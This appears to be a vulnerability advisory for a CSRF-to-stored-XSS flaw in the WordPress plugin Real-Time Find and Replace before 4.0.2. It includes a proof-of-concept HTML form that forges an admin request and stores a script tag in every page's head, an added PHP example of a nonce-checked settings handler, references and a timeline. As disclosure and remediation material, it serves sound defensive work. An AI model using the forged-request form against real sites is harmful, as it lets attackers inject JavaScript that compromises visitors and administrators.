Real-Time Find and Replace < 4.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting



Description
"This flaw could allow any user to inject malicious JavaScript anywhere on a site if they could trick a site’s administrator into performing an action, like clicking on a link in a comment or email."
Proof of Concept
<html>
  <body>
    <form action="http://URL/wp-admin/tools.php?page=real-time-find-and-replace" method="POST">
      <input type="hidden" name="setup&#45;update" value="" />
      <input type="hidden" name="farfind&#91;0&#93;" value="&lt;head&gt;" />
      <input type="hidden" name="farreplace&#91;0&#93;" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
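
The forged request above succeeds when the settings handler accepts a POST without any per-user token. The following is an added example of a handler that rejects it, written for this page and not taken from the plugin or its 4.0.2 patch; the field names come from the proof of concept, while the function, constant and option names are hypothetical.

```php
<?php
// Added example, not the plugin's code. Field names setup-update, farfind and
// farreplace come from the proof of concept; everything prefixed far_example_
// or FAR_EXAMPLE_ is a hypothetical name chosen for this sketch.
const FAR_EXAMPLE_NONCE_ACTION = 'far_example_save_rules';
const FAR_EXAMPLE_NONCE_FIELD  = 'far_example_nonce';
const FAR_EXAMPLE_OPTION       = 'far_example_rules';

// Call inside the settings <form>: emits a hidden token bound to the
// logged-in user, the action name and a time window.
function far_example_render_nonce_field() {
    wp_nonce_field( FAR_EXAMPLE_NONCE_ACTION, FAR_EXAMPLE_NONCE_FIELD );
}

function far_example_save_rules() {
    if ( ! isset( $_POST['setup-update'] ) ) {
        return; // not a rule-update submission
    }
    // Authorization: only administrators may change replacement rules.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', '', array( 'response' => 403 ) );
    }
    // CSRF defence: ends the request unless the POST carries a valid nonce.
    // The cross-site form in the proof of concept has no way to supply one.
    check_admin_referer( FAR_EXAMPLE_NONCE_ACTION, FAR_EXAMPLE_NONCE_FIELD );

    $find    = isset( $_POST['farfind'] ) ? (array) wp_unslash( $_POST['farfind'] ) : array();
    $replace = isset( $_POST['farreplace'] ) ? (array) wp_unslash( $_POST['farreplace'] ) : array();

    $rules = array();
    foreach ( $find as $i => $needle ) {
        if ( ! is_string( $needle ) || '' === $needle ) {
            continue; // skip empty or nested-array input
        }
        $value = ( isset( $replace[ $i ] ) && is_string( $replace[ $i ] ) ) ? $replace[ $i ] : '';
        // Accounts without the unfiltered_html capability get KSES-filtered
        // replacements, so <script> cannot be stored by them.
        if ( ! current_user_can( 'unfiltered_html' ) ) {
            $value = wp_kses_post( $value );
        }
        $rules[] = array( 'find' => $needle, 'replace' => $value );
    }
    update_option( FAR_EXAMPLE_OPTION, $rules );
}
add_action( 'admin_init', 'far_example_save_rules' );
```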

Affects Plugin

Fixed in version 4.0.2

References

URL https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/
URL https://plugins.trac.wordpress.org/changeset/2289725/real-time-find-and-replace

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Verified No
WPVDB ID 10193

Timeline

Publicly Published 2020-04-27
Added 2020-04-27
Last Updated 2020-04-28
